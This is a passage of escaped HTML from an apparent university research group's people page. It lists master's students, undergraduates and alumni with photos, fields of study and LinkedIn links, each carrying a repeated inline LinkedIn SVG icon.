0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c201-outer\">\n            <div data-colibri-id=\"182-c201\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c201 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c202\" class=\"d-block style-854 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-1663377340901.jpg\" class=\"wp-image-1657 style-854-image style-local-182-c202-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c202-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"h-global-transition-all h-heading style-850 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c203\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c204\" class=\"h-text h-text-component style-851 style-local-182-c204 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c205\" class=\"h-text h-text-component style-902 style-local-182-c205 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c206\" class=\"style-855 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c131\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c131 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c138\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c138 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c139-outer\">\n            <div data-colibri-id=\"182-c139\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c139 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c140\" class=\"h-global-transition-all h-heading style-844 style-local-182-c140 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c140\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c132\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c132 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c133-outer\">\n            <div data-colibri-id=\"182-c133\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c133 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c134\" class=\"d-block style-831 style-local-182-c134 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c134-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c134-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c135\" class=\"h-global-transition-all h-heading style-832 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c135\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-text h-text-component style-833 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"style-835 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c207-outer\">\n            <div data-colibri-id=\"182-c207\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c207 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c208\" class=\"d-block style-831 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c208-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c208-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c209\" class=\"h-global-transition-all h-heading style-832 style-local-182-c209 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c209\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raiyan</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c210\" class=\"h-text h-text-component style-833 style-local-182-c210 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c211\" class=\"style-835 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c141\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c141 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c192\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c192 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c193-outer\">\n            <div data-colibri-id=\"182-c193\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c193 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c194\" class=\"h-global-transition-all h-heading style-926 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c194\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c142\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c142 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c143-outer\">\n            <div data-colibri-id=\"182-c143\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c143 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c144\" class=\"d-block style-913 style-local-182-c144 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c144-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c144-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c145\" class=\"h-global-transition-all h-heading style-914 style-local-182-c145 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c145\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c146\" class=\"h-text h-text-component style-915 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"style-917 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c148-outer\">\n            <div data-colibri-id=\"182-c148\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c148 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c149\" class=\"d-block style-918 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c149-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c149-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c150\" class=\"h-global-transition-all h-heading style-914 style-local-182-c150 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c150\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c151\" class=\"h-text h-text-component style-915 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"style-919 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 